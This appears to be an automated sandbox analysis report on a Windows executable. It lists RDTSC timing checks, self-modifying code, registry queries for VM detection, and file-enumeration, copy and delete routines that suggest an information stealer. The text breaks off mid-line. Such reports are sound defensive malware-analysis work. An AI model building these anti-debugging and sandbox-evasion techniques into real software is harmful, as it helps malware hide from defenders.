              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E82 second address: 739E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EA99 second address: 73EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EA9D second address: 73EAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAA3 second address: 73EAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAA9 second address: 73EAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73EAAD second address: 73EAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66208C second address: 662090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662090 second address: 66209A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66209A second address: 6620AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6620AB second address: 6620AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6620AF second address: 6620B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E02A second address: 74E037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007FF8A909BC18h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E612 second address: 74E629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FF8A95A6CBEh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E629 second address: 74E633 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E633 second address: 74E642 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A95A6CB8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E642 second address: 74E648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7542A7 second address: 7542AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7542AD second address: 7542C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF8A909BC23h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754455 second address: 75446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CBEh 0x00000007 jo 00007FF8A95A6CBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DDC second address: 756DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DE4 second address: 756DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DEC second address: 756DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DF2 second address: 756DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF8A95A6CB6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756DFF second address: 756E0D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF8A909BC16h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756E0D second address: 756E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756E2F second address: 756E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C28 second address: 756C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C2C second address: 756C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C32 second address: 756C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A95A6CC0h 0x0000000d jmp 00007FF8A95A6CC2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756C5C second address: 756C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F23 second address: 764F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F27 second address: 764F4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A909BC16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8A909BC27h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764F4E second address: 764F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771508 second address: 771510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77125F second address: 771265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771265 second address: 771270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8A909BC16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B4B second address: 787B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF8A95A6CC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B69 second address: 787B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Ah 0x00000007 jl 00007FF8A909BC1Ch 0x0000000d jno 00007FF8A909BC16h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787B88 second address: 787BAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF8A95A6CC9h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7869A6 second address: 7869B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF8A909BC16h 0x0000000a jnc 00007FF8A909BC16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786AF8 second address: 786AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786C7F second address: 786C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786C88 second address: 786CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786CA4 second address: 786CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786CA8 second address: 786CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FF8A95A6CBEh 0x0000000c popad 0x0000000d je 00007FF8A95A6CF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FF8A95A6CB6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7873CF second address: 7873E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7876D7 second address: 78773A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FF8A95A6CBAh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FF8A95A6CC8h 0x0000001d jmp 00007FF8A95A6CBDh 0x00000022 popad 0x00000023 jmp 00007FF8A95A6CBAh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BB83 second address: 78BB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190265 second address: 5190300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF8A95A6CC0h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FF8A95A6CC1h 0x00000016 pushfd 0x00000017 jmp 00007FF8A95A6CC0h 0x0000001c adc si, 07D8h 0x00000021 jmp 00007FF8A95A6CBBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov al, 14h 0x0000002c pushad 0x0000002d mov cx, dx 0x00000030 call 00007FF8A95A6CC3h 0x00000035 pop esi 0x00000036 popad 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b call 00007FF8A95A6CC5h 0x00000040 pushad 0x00000041 popad 0x00000042 pop eax 0x00000043 push eax 0x00000044 push edx 0x00000045 movsx edi, ax 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190343 second address: 5190369 instructions: 0x00000000 rdtsc 0x00000002 mov cx, A2B1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF8A909BC1Eh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF8A909BC1Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190369 second address: 519036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519036D second address: 5190373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190373 second address: 51903A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, D593h 0x00000007 mov cx, 37EFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FF8A95A6CC5h 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 call 00007FF8A95A6CBCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903A7 second address: 51903E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF8A909BC21h 0x0000000b add ax, F7B6h 0x00000010 jmp 00007FF8A909BC21h 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF8A909BC1Dh 0x00000020 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4FF9FB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 725B92 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27193
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26011
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_002C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_002C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_002CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_002CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_002CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,l